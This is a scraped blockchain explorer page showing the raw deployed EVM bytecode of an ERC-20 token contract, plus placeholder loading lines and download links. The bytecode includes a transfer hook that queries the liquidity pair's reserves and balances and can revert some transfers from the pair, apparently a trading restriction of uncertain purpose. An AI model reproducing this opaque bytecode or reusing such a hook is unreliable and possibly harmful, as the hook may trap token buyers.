6000602084013e6108f0565b606091505b509150506000808280602001905181019061090b9190610cf0565b915091506000858060200190518101906109259190610d14565b905060008580602001905181019061093d9190610d14565b6008546040516001600160a01b0391821660248201529192506000919084169060440160408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b179052516109959190610cd4565b6000604051808303816000865af19150503d80600081146109d2576040519150601f19603f3d011682016040523d82523d6000602084013e6109d7565b606091505b509150506000818060200190518101906109f19190610d31565b6008546040516001600160a01b0391821660248201529192506000919085169060440160408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b17905251610a499190610cd4565b6000604051808303816000865af19150503d8060008114610a86576040519150601f19603f3d011682016040523d82523d6000602084013e610a8b565b606091505b50915050600081806020019051810190610aa59190610d31565b6007549091506001600160a01b0390811690871603610ae85782881115610ade57610ad08389610d4a565b9b506103e88c119d50610b16565b8288149c50610b16565b6007546001600160a01b0390811690861603610b165780871115610b1057610ad08188610d4a565b8087149c505b8d158015610b2257508c155b610b2b57600080fd5b50505050505050505050505050505b505050565b60005b83811015610b5a578181015183820152602001610b42565b50506000910152565b6020815260008251806020840152610b82816040850160208701610b3f565b601f01601f19169190910160400192915050565b6001600160a01b0381168114610bab57600080fd5b50565b60008060408385031215610bc157600080fd5b8235610bcc81610b96565b946020939093013593505050565b600080600060608486031215610bef57600080fd5b8335610bfa81610b96565b92506020840135610c0a81610b96565b929592945050506040919091013590565b600060208284031215610c2d57600080fd5b813561043081610b96565b60008060408385031215610c4b57600080fd5b8235610c5681610b96565b91506020830135610c6681610b96565b809150509250929050565b600181811c90821680610c8557607f821691505b602082108103610ca557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561031457610314610cab565b60008251610ce6818460208701610b3f565b9190910192915050565b60008060408385031215610d0357600080fd5b505080516020909101519092909150565b600060208284031215610d2657600080fd5b815161043081610b96565b600060208284031215610d4357600080fd5b5051919050565b8181038181111561031457610314610cab56fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220684886e73e75f978bce54a38a6188214dc149926a8d8b122237f853ca093dfd464736f6c63430008110033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806349bd5a5e11610097578063a9059cbb11610066578063a9059cbb1461020a578063c54e44eb1461021d578063dd62ed3e14610230578063ffa1ad741461026957600080fd5b806349bd5a5e146101b357806370a08231146101c657806395d89b41146101ef578063a457c2d7146101f757600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce5671461016057806339509351146101755780633c2653f21461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610271565b60405161010f9190610b63565b60405180910390f35b61012b610126366004610bae565b610303565b604051901515815260200161010f565b6005545b60405190815260200161010f565b61012b61015b366004610bda565b61031a565b60045460405160ff909116815260200161010f565b61012b610183366004610bae565b610383565b60065461019b906001600160a01b031681565b6040516001600160a01b03909116815260200161010f565b60085461019b906001600160a01b031681565b61013f6101d4366004610c1b565b6001600160a01b031660009081526020819052604090205490565b6101026103b9565b61012b610205366004610bae565b6103c8565b61012b610218366004610bae565b610417565b60075461019b906001600160a01b031681565b61013f61023e366004610c38565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b61013f600181565b60606002805461028090610c71565b80601f01602080910402602001604051908101604052809291908181526020018280546102ac90610c71565b80156102f95780601f106102ce576101008083540402835291602001916102f9565b820191906000526020600020905b8154815290600101906020018083116102dc57829003601f168201915b5050505050905090565b6000610310338484610437565b5060015b92915050565b6000610327848484610561565b610379843361037485604051806060016040528060288152602001610d84602891396001600160a01b038a16600090815260016020908152604080832033845290915290205491906106ef565b610437565b5060019392505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490916103109185906103749086610424565b60606003805461028090610c71565b6000610310338461037485604051806060016040528060258152602001610dac602591393360009081526001602090815260408083206001600160a01b038d16845290915290205491906106ef565b6000610310338484610561565b60006104308284610cc1565b9392505050565b6001600160a01b03831661049e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084015b60405180910390fd5b6001600160a01b0382166104ff5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610495565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166105c55760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610495565b6001600160a01b0382166106275760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610495565b61063283838361071b565b61066f81604051806060016040528060268152602001610d5e602691396001600160a01b03861660009081526020819052604090205491906106ef565b6001600160a01b03808516600090815260208190526040808220939093559084168152205461069e9082610424565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610554565b600081848411156107135760405162461bcd60e51b81526004016104959190610b63565b505050900390565b6008546001600160a01b03848116911614801561074657506006546001600160a01b03838116911614155b15610b3a5760085460408051600481526024810182526020810180516001600160e01b0316630dfe168160e01b17905290516000928392839283926001600160a01b03169161079491610cd4565b6000604051808303816000865af19150503d80600081146107d1576040519150601f19603f3d011682016040523d82523d6000602084013e6107d6565b606091505b5060085460408051600481526024810182526020810180516001600160e01b031663d21220a760e01b1790529051929450600093506001600160a01b03909116916108219190610cd4565b6000604051808303816000865af19150503d806000811461085e576040519150601f19603f3d011682016040523d82523d6000602084013e610863565b606091505b5060085460408051600481526024810182526020810180516001600160e01b0316630240bc6b60e21b1790529051929450600093506001600160a01b03909116916108ae9190610cd4565b6000604051808303816000865af19150503d80600081146108eb576040519150601f19603f3d011682016040523d82523d6000602084013e6108f0565b606091505b509150506000808280602001905181019061090b9190610cf0565b915091506000858060200190518101906109259190610d14565b905060008580602001905181019061093d9190610d14565b6008546040516001600160a01b0391821660248201529192506000919084169060440160408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b179052516109959190610cd4565b6000604051808303816000865af19150503d80600081146109d2576040519150601f19603f3d011682016040523d82523d6000602084013e6109d7565b606091505b509150506000818060200190518101906109f19190610d31565b6008546040516001600160a01b0391821660248201529192506000919085169060440160408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b17905251610a499190610cd4565b6000604051808303816000865af19150503d8060008114610a86576040519150601f19603f3d011682016040523d82523d6000602084013e610a8b565b606091505b50915050600081806020019051810190610aa59190610d31565b6007549091506001600160a01b0390811690871603610ae85782881115610ade57610ad08389610d4a565b9b506103e88c119d50610b16565b8288149c50610b16565b6007546001600160a01b0390811690861603610b165780871115610b1057610ad08188610d4a565b8087149c505b8d158015610b2257508c155b610b2b57600080fd5b50505050505050505050505050505b505050565b60005b83811015610b5a578181015183820152602001610b42565b50506000910152565b6020815260008251806020840152610b82816040850160208701610b3f565b601f01601f19169190910160400192915050565b6001600160a01b0381168114610bab57600080fd5b50565b60008060408385031215610bc157600080fd5b8235610bcc81610b96565b946020939093013593505050565b600080600060608486031215610bef57600080fd5b8335610bfa81610b96565b92506020840135610c0a81610b96565b929592945050506040919091013590565b600060208284031215610c2d57600080fd5b813561043081610b96565b60008060408385031215610c4b57600080fd5b8235610c5681610b96565b91506020830135610c6681610b96565b809150509250929050565b600181811c90821680610c8557607f821691505b602082108103610ca557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561031457610314610cab565b60008251610ce6818460208701610b3f565b9190910192915050565b60008060408385031215610d0357600080fd5b505080516020909101519092909150565b600060208284031215610d2657600080fd5b815161043081610b96565b600060208284031215610d4357600080fd5b5051919050565b8181038181111561031457610314610cab56fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220684886e73e75f978bce54a38a6188214dc149926a8d8b122237f853ca093dfd464736f6c63430008110033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.